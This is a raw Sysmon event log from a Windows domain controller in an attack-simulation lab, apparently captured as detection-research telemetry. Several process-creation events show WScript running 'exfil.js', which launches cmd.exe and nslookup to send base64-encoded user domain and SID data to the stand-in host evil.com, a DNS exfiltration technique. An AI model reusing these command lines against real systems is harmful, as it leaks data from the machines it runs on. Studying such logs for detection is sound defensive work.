154100x8000000000000000217412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.294{2E1864BB-1905-629A-0B47-000000005F02}6168C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlukhhna.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.274{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlugdip.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.243{2E1864BB-1905-629A-0947-000000005F02}62246044C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-0A47-000000005F02}2512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.243{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0A47-000000005F02}2512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.243{2E1864BB-1905-629A-0847-000000005F02}73607412C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-0A47-000000005F02}2512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.251{2E1864BB-1905-629A-0A47-000000005F02}2512C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-0847-000000005F02}7360C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlugdip.tmp 2>&1 10341000x8000000000000000217402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.212{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-0947-000000005F02}6224C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.212{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-0947-000000005F02}6224C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.212{2E1864BB-1905-629A-0947-000000005F02}62246044C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-0847-000000005F02}7360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.190{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0947-000000005F02}6224C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.190{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.190{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.190{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.190{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.174{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0847-000000005F02}7360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.174{2E1864BB-18E0-629A-6742-000000005F02}39768152C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-0847-000000005F02}7360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.189{2E1864BB-1905-629A-0847-000000005F02}7360C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlugdip.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.174{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwae.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.969{00000000-0000-0000-0000-000000000000}2328<unknown process>-udpfalsefalse127.0.0.1-51456-false127.0.0.1-53domain 354300x8000000000000000217389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.968{00000000-0000-0000-0000-000000000000}2328<unknown process>-udptruefalse127.0.0.1-51456-false127.0.0.1-53domain 354300x8000000000000000217388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.968{00000000-0000-0000-0000-000000000000}2328<unknown process>-udpfalsefalse127.0.0.1-51455-false127.0.0.1-53domain 354300x8000000000000000217387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.967{00000000-0000-0000-0000-000000000000}2328<unknown process>-udptruefalse127.0.0.1-51454-false127.0.0.1-53domain 354300x8000000000000000217386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.803{00000000-0000-0000-0000-000000000000}7920<unknown process>-udpfalsefalse127.0.0.1-51451-false127.0.0.1-53domain 354300x8000000000000000217385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.803{00000000-0000-0000-0000-000000000000}7920<unknown process>-udptruefalse127.0.0.1-51451-false127.0.0.1-53domain 354300x8000000000000000217384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.627{00000000-0000-0000-0000-000000000000}2848<unknown process>-udptruefalse127.0.0.1-51450-false127.0.0.1-53domain 354300x8000000000000000217383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.627{00000000-0000-0000-0000-000000000000}2848<unknown process>-udpfalsefalse127.0.0.1-51449-false127.0.0.1-53domain 354300x8000000000000000217382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.626{00000000-0000-0000-0000-000000000000}2848<unknown process>-udpfalsefalse127.0.0.1-51448-false127.0.0.1-53domain 10341000x8000000000000000217381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.159{2E1864BB-1905-629A-0647-000000005F02}77042628C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-0747-000000005F02}5776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.490{00000000-0000-0000-0000-000000000000}7340<unknown process>-udpfalsefalse127.0.0.1-51445-false127.0.0.1-53domain 354300x8000000000000000217379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.293{00000000-0000-0000-0000-000000000000}2632<unknown process>-udpfalsefalse127.0.0.1-51441-false127.0.0.1-53domain 354300x8000000000000000217378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.293{00000000-0000-0000-0000-000000000000}2632<unknown process>-udptruefalse127.0.0.1-51441-false127.0.0.1-53domain 10341000x8000000000000000217377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.293{00000000-0000-0000-0000-000000000000}2632<unknown process>-udpfalsefalse127.0.0.1-51440-false127.0.0.1-53domain 10341000x8000000000000000217375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.293{00000000-0000-0000-0000-000000000000}2632<unknown process>-udptruefalse127.0.0.1-51440-false127.0.0.1-53domain 10341000x8000000000000000217372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 